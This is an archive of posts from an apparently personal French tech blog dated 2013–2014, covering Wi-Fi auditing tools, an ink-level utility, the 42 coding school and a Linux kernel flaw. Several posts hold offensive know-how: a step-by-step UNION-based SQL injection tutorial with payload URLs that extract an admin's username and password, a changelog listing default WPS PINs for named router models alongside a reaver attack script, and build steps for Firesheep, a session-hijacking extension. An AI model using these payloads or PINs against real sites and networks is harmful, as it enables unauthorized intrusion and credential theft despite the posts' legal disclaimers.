dimanche 2 mars 2014

Générateur de PIN WPS "WPSPIN



Depuis pas mal de temps maintenant, une faille a été découverte au niveau du protocole WPS (protocole wifi).

Nous savons tous, que le WEP est à éviter pour la sécurité de son wifi; est depuis la découverte de la faille du WPS, les Box avec une clé en WPA ne sont pas plus en sécurité. (ATTENTION toutefois, toutes les box n'ont pas le protocole WPS d'activer par défaut, ex: freebox).

Certaine box, ont une semi protection, qui a X tentative de pin erronée bloque l’accès au WPS pour un certain temps. (ex: box SFR, Livebox, pour les box Française).


 Je vous passe les blabla de la faille, mais il faut savoir qu'un programmeur a créer reaver, pour tester cette faille (Au début de cette découverte il fallait pas loin d'une journée entière pour avoir le PIN).



Je rentre dans le vif du sujet, avec WPSPIN coder par "kcdtv" modérateur du forum crack-wifi et des membres d'un forum Espagnol.



Ce script automatise l'attaque avec reaver, vous n'aurez rien a faire hormis répondre a certaine questions pour lancer votre attaques (vous devez avoir reaver d'installer, est une carte wifi supportant le mode monitor).






Vous pouvez télécharger WPSPIN en version 1.5 dont voici le changelog:

## 1.5 ( 24/01/2014 )
#
#        - Imlemented bash adaptation of esay box arcadyan vodane PIN and WPA algorithm by coeman76
#        - Grafic changes and code optimization
#        - New filters for preventing permissions issues, directory issues, unisntalled tools isuues, interfaces issues
#        - Fixed the bug for FTE red
#        - New option to define a sequence of PIN to try first ( thanks to Spawn for recursive_generator )
#        - New option to enter manually a different PIN then than one proposed
#        - -p option with reaver is not used any longuer due to lost of quality of attack and PIN are genrated live
#        - detection of processing error to backup the sesssion untill the PIN that could create a problem in order to avoid the "99,99% bug"
#        - function to adapt mode monitor managment with RT 3XXX chipsets
#        - Default WPA key is shown once target has been selected if the algorithm for default wpa is known ( still a lot to implement )
#        - prevent reaver failure when saving a sesssion
#        - bash adaptation of arcadyan easy box WPA and PIN generator by coeman76
#        - display the progress of a former sesssion before attacking the target again
#        - option to allow the user to customize the reaver command line
#        - New supported bssid
#             - modification for 08863B with new devices, repeater N300 Dual-Band Wi-Fi Range Extender no compatible, with AP rate limit
#             - new bssid  F81A67 for TD-W8961ND with AP RATE LIMIT
#             - new vodafone-XXXX BSSID = 6296BF 6ACBA8 62:CB:A8 72:CB:A8....
#             - new bssid for PDG4100ND D0:D4:12 with refereed PIN 88202907
#          - New supported devices
#             - NEW DEVICES, D-LINK, DSL-2730U (bssid = B8A386 | B8A386) & DSL-2750U C8:D3:A3 , with respectively generic PIN 20172527 &  #21464065
#             - NEW DEVICE, ZTE ; ZXHN_H108N , default generic 12345670 bssids: F8:1B:FA & F8:ED:80 default ssid = MOVISTAR_XXXX
#             - 08:7A:4C E8:CD:2D 0C:96:BF NEW DEVICE   Orange-XXXX / HG530s ( Huawei )
#             - E4:C1:46 for MOVISTAR_XXXX. Model : Observa Telecom - RTA01N_Fase2 comercialized by Objetivos y Servicios de Valor
#             - new TP-LINK device affected TD-W8951ND with AP RATE LIMIT and known bssid A0:F3:C1:
#             - the last Bbox, with default ssid Bbox-XXXXXXXX, manufactures by SAMSUNG is vulnerable , known BSSID = 5C:A3:9D DC:71:44 D8:6C:E9
#             - VodafoneXXXX New device for mac 1C:C6:3C 50:7E:5D 74:31:70 84:9C:A6 88:03:55 full disclosure aracadyan PIN-WPA model : ARV7510PW22
#             - HG 532e from djibouti, default ssid HG532e-XXXXXX , mac  EC:23:3D
#             - DG950A from Arris Interactive  L.L.C, mac 00:1D:CF, default SSID ARRIS-XXXX

#             - CDE-30364 from Hiltron - used by spanish ISP OnO with default ssid OnOXXX0 - mac : BC1401 68B6CF 00265B

Pour le téléchargement vous avez le lien direct ,  ou  miror.

Vous pouvez suivre l'avancement de ce script dans la source de cette news.

mardi 18 février 2014

LinSSID (inssider pour linux)



Pour ceux qui s'intéresse un peu au wardriving, vous devez connaitre inssider, ce fameux logiciel qui permet de scanner tout les réseaux wifi avoisinant (même ceux qui sont crypter, et dont vous n'avez pas la clé wep/wpa).

Ce logiciel permet de connaitre pas mal de chose sur les réseaux wifi mais je ne vais pas en faire un exposer, wikipedia s'en chargera mieux que moi.



Cette  article a pour but de vous faire connaitre et d'installer  LinSSID l'équivalent d'inssider mais sous Linux.

Il comporte les même fonctionnalité que son grand frere qui tourne sous Windows, à savoir:

- Connaitre  l’encryptage(wep,wpa,(TKIP,AES)
- La force du signal
- Le canal
- La fréquence
- Le mode
- L'adresse MAC
- Le constructeur
- Est plein d'autres encore, comme vous pouvez le voir sur cette capture d'écran.




Je ne vais pas tout énumérer mais sachez que si vous faites de la comparaison/wardraving, il vous faut cette outils dans votre laptop. (attention vous êtes seules responsable de vos actes)

Je l'ai tester avec succès sur un Desktop tournant sous Kali-Linux.

Pour l'installation, deux choix s'offre a vous:

- Le .deb que vous trouverez sur le sourceforge de l'auteur

- Par les Dépots:

add add-apt-repository ppa:wseverin/ppa
apt-get update
apt-get install linssid
Vous devez arranger les commandes selon votre distribution, (ici pour débian et dérivée).

Sachez que vous pouvez télécharger les sources.

vendredi 7 février 2014

Installer firesheep sur Linux (Kali-Linux 1.0.6)


Il y a  un moment déjà Eric Butler présenter à la Toorcon , une extensions pour Firefox qui permet de sniffer le réseaux local a la recherche de sessions qui transite en HTTP (non sécurisé donc).

Cet extension permet donc de récupérer de des sessions, et ainsi se connecter avec les login/mdp de la victime.

Pour les sites supporter par firesheep, vous pouvez regarder sur le Github de l'auteur.

Il faut savoir que cette extension est nativement installable sur windows, mais sous linux ou faut compiler les sources sois même.

Nous commençons par installer les dépendances nécessaires:

      apt-get install autoconf libtool libpcap-dev libboost-all-dev libudev-dev

Pour télécharger les sources:
$ git clone https://github.com/codebutler/firesheep.git
$ cd firesheep
$ git submodule update --init
 Puis dans un terminal vous compilez les sources:
     ./autogen.sh
      make 
Ensuite pour l'installer dans Firefox, vous allez dans Fichier => Ouvrir un fichier => firesheep/build/firesheep.xpi

Cette installation a été tester avec succès sur une machine Kali Linux 1.0.6

vendredi 6 septembre 2013

Connaitre le niveau d'encre sous Linux



Pour connaître le niveau d'encre d'une imprimante, on utilise souvent un logiciel du constructeur, mais bien trop souvent, cette solution n'est que pour les windowsiens.

Pour les linuxiens qui veulent connaitre leur niveau d'encre je vous est trouver une solution:  ink

Il vous faudra  installer la bibliothèque libinklevel.
 sudo apt-get install libinklevel5
Ensuite, installer ink:
sudo apt-get install ink

Vous voilas, fin pret a connaitre votre niveau d'encre avec la commande suivante:
ink  -p usb
Ce qui nous donne comme résultat:

$ ink -p usb
ink v0.5.0 (c) 2009 Markus Heinz
Canon iP4500 series
Black:                          0%
Photoblack:                    40%
Yellow:                        40%
Magenta:                       40
Cyan:                         100%

Est pour connaitre les autres options que vous propose ink, un petit ink --help vous donneras la réponses.

jeudi 13 juin 2013

Tuto Faille SQLi



Je vais vous présentez un tuto plutôt sympas, qui va vous apprendre a réaliser des injection sql.


Je vous épargne les explications sur le pourquoi, du comment de cette faille, mais sachez  qu'une injection sql est possible, lorsque le code php est mal coder.(Si vous faites des recherche sur la failles, vous comprendrez facilement dont je vous parle).

Pour venir dans le vif du sujet, il faut trouver un site a tester (il faut savoir que l'intrusion/modification/altération d'un système de donnée, est punissable par le code pénal, donc a tester sur vos site, ou avec l'accord de l'auteur du site).

Nous allons prendre comme exemple de site www.exemple.fr/newscat.php?id=1

Nous allons tester notre site pour voir si il est faillible par la faille sql, nous ajoutons ' a la suite de l'url.

 www.exemple.fr/newscat.php?id=1'

Si notre site nous retourne, un erreur sql c'est que le site est sujet a la faille.

Nous allons donc tester le nombre de colonnes (important pour la suite).Nous ajoutons: espace order by 1-- ou espace order by 1/*

www.exemple.fr/newscat.php?id=1 order by 1--

Le site devrait s'afficher normalement,nous allons continuer jusqu’au moment ou le site va nous donner un erreur sql.

Vous faites donc.

www.exemple.fr/newscat.php?id=1 order by 10-- (le site s'affiche bien,donc nous avons au moins 10 colonnes)

www.exemple.fr/newscat.php?id=1 order by 11-- (le site nous donne une erreur sql,nous savons alors que le nombres de colonnes est de 10, puisqu'il ne nous a pas retourner d'erreur avec 10).

Nous allons tenter de trouver la colonnes qui contient les données qui peuvent nous intéresse,On ajoute union all select , a la place d' order by 1--.

www.exemple.fr/newscat.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10-- ( vous mettez a la suite autant de colonnes que vous avez trouvez au début avec order by *--).

Vous devriez voir des chiffres qui s'affiche sur votre page,ce sont les colonnes qui seront accessible.Nous allons dire que les colonnes 3,8,9 sont accessible car le site nous affiche la page normale + les chiffres 3,8,9.

Nous allons tenter de connaitre la version de la colonnes, nous remplaçons le nombre de la colonne que nous voulons tester par @@version, nous allons le faire avec la colonnes 3 dans notre exemple.

www.exemple.fr/newscat.php?id=1 union all select 1,2,@@version,4,5,6,7,8,9,10--

Si la version afficher est 4.* , alors passer votre chemin, si au contraire la version est 5.*, alors nous allons continuer.

Pour avoir le nom de la table (important pour la suite) nous remplaçons @@version , par table_name est nous ajoutons à la fin de notre url from information_schema.tables--.

www.exemple.fr/newscat.php?id=1 union all select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables--

Nous recherchons le plus souvent une table qui contient admin, dans notre exemple, la table s'appelle admin.(j'ai faciliter pour l'exemple).

Nous allons donc convertir le nom de la table en ASCII (textop.us/Text-Convert/Ascii), pour la table admin, la conversion sera donc => 097 100 109 105 110.

Nous devons remplacer les espace (parfois les espace seront remplacer par des  signes du style ;&#)vous remplacez donc par des virgules, les espaces, ou les signes, se qui nous donne pour notre colonnes admin => 097,100,109,105,110 (attention au virgules).

Ensuite changer  table_name par column_name est information_schema.tables par information_schema.columns where table_name=char(le code ASCII)

www.exemple.fr/newscat.php?id=1 union all select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns
where table_name=char(
097,100,109,105,110)--

Nous voyons qu'il y a une colonnes user est une colonnes password, nous pouvons donc afficher le nom est le mot de passe de notre admin.Car nous savons que l'id est contenue dans la colonnes user est pour le mot de passe la colonnes est password.
Supprimez tous ce qui se trouve après ...9,10  est ajouter
from admin et remplacer column-name par
concat(username,0x3a,password)
(0x3a est le code ASCII,qui permet  de séparer l'user du mot de passe). 


www.exemple.fr/newscat.php?id=1 union all select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 from admin

Nous avons donc admin:SontMotDePasse qui s'affiche.

Ce tuto a pour but la compréhension, est non l'appelle a l'intrusion des système, je ne pourrais être tenus responsable de vos actes.

Sachez qu'il existe des dorks, qui permette de trouver des site facilement faillibles, mais pour les raisons citer plus haut, je ne les mets pas a disposition, mais il se trouve sur google.




jeudi 16 mai 2013

Faire une école d’informatique gratuitement



J'ai vu cette infos ce matin au journal de game one, est je doit dire que Xavier Neal de chez  Free a toujours un longueur d'avance sur les concurrent (peut être un Steve Jobs en puissance??).

Il vous propose de postuler pour pouvoir faire une école d'informatique (apprendre a coder principalement), mais le tout GRATUITEMENT, est c'est là qu'il se différencie des autres, car il faut savoir qu'une année chez epitech coûte approximativement 8000e/année.

Pour ce qui veulent en savoir un peut plus:

-Tout le monde peut poser sa candidature
-Pas de Diplôme requis
-Etre âgée entre 18 est 30


Comment les sélections se passe?
Il suffis de vous rende sur le site 42 (créer pour l'occasion), remplissez le formulaire, ensuite vous aurez une série de 40 questions (culture générale/logique/compréhension), pour finir votre candidature.
Une fois cela fait, vous aurez des exercices a effectuer (ce sont les test), il faut réserver les places pour pouvoir les effectuer, mais aussi du temps, car certaine épreuve peuvent durer 2 h.
On ne peut pas faire de pause pendant que l'on fait l'épreuve, donc choisissez bien votre créneaux horaire pour être sur de pouvoir aller jusqu'au bout.

Vous saurez suite a ces épreuves si vous êtes retenue pour la suite des recrutement, pas la peine de vous dire que nous sommes déjà un bon nombres de candidats, alors je vous souhaite bonne chance dans vos démarche.

Je vous laisse l'interview qui est passé ce matin sur game one (sa commence à la 4.49min)





Faille dans le kernel Linux (2.6.37-3.8.8)



Une faille CRITIQUE, est qui est connut des devs du kernel de linux depuis bientôt 2 ans, n'as toujours pas été corriger.

Cette faille touche même les dernières version kernel, à savoir la 3.8.8, mais aussi les précédente versions qui on été compilé avec l'option CONFIG_PERF_EVENTS.

Cette dernière permet a un utilisateur sans droit de se donner les droit route de la machine/serveur, afin de foutre le gros bordel.

Par ailleurs  malgré le manque de patch, on nous assure que les futur kernel seront patché pour cette faille, qui je le rappelle date de plus de 2 ans.


Vous pouvez trouver les infos sur  le code source de l'exploit , ainsi que les détails de cette faille.


Merci a Korben de nous avoir prévenue.